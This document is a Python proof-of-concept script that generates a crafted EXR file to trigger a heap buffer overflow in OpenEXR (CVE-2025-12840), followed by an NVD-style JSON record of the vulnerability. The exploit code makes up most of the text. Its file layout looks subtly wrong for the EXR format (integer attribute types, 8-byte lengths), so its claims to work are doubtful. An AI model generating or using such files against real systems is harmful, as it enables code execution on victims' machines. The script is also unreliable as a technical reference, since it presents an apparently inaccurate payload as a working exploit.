CVE-2025-12840

# CVE-2025-12840 PoC - Malicious EXR File Generator # Target: Academy Software Foundation OpenEXR < latest version # Vulnerability: Heap-based Buffer Overflow in EXR parsing # CVSS: 7.8 (High) import struct import os def create_malicious_exr(): """ Generate a malicious EXR file that triggers heap buffer overflow during parsing due to improper length validation. """ # EXR magic number magic = b'\x76\x2f\x31\x01' # Version field - standard EXR v2 version = struct.pack('<I', 2) flags = struct.pack('<I', 0) # Craft malicious header with oversized attributes # This exploits the lack of proper length validation header = b'' # Channel list with oversized data header += b'channels\x00' header += struct.pack('<I', 0x02) # CHUNK_DATA type # Create oversized length field - triggers overflow # Adjust size based on target buffer allocation overflow_size = 0x10000 # Large overflow size header += struct.pack('<Q', overflow_size) # Oversized length header += b'A' * overflow_size # Overflow data # Compression attribute header += b'compression\x00' header += struct.pack('<I', 0) # NO_COMPRESSION header += struct.pack('<Q', 1) header += b'\x00' # Data window attribute header += b'dataWindow\x00' header += struct.pack('<I', 0x23) # BOX2I type header += struct.pack('<Q', 16) header += struct.pack('<iiii', 0, 0, 1920, 1080) # End of header marker header += b'\x00' # Construct complete EXR file malicious_exr = magic + version + flags + header return malicious_exr def main(): output_file = 'CVE-2025-12840_poc.exr' print(f'[*] Generating malicious EXR file for CVE-2025-12840') print(f'[*] Target: OpenEXR EXR File Parsing Heap Buffer Overflow') print(f'[*] CVSS: 7.8 (High)') exr_data = create_malicious_exr() with open(output_file, 'wb') as f: f.write(exr_data) print(f'[+] PoC file created: {output_file}') print(f'[+] File size: {len(exr_data)} bytes') print(f'[!] Note: This PoC is for educational/research purposes only') print(f'[!] Do not use for malicious activities') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-12840", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:44.533", "lastModified": "2026-01-15T16:46:26.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Academy Software Foundation OpenEXR EXR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Academy Software Foundation OpenEXR. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of EXR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27948."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.3", "matchCriteriaId": "A698C88E-D934-4BCC-9811-3D6FEDFC8320"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-991/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}